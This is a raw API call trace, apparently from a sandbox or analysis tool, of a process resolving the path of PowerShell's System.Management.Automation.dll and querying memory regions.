	[0338.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.505] VirtualQuery (in: lpAddress=0x14b3c0, lpBuffer=0x14c280, dwLength=0x30 | out: lpBuffer=0x14c280*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.506] VirtualQuery (in: lpAddress=0x14b450, lpBuffer=0x14c310, dwLength=0x30 | out: lpBuffer=0x14c310*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.508] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.509] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.511] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.511] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.511] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.512] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.513] VirtualQuery (in: lpAddress=0x14b800, lpBuffer=0x14c6c0, dwLength=0x30 | out: lpBuffer=0x14c6c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.513] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.513] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.513] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.513] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.513] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x58e84400, Data2=0x2782, Data3=0x4a54, Data4=([0]=0x9f, [1]=0xc8, [2]=0x9e, [3]=0xd7, [4]=0xd5, [5]=0x3a, [6]=0xf2, [7]=0x50))) returned 0x0
	[0338.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0338.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
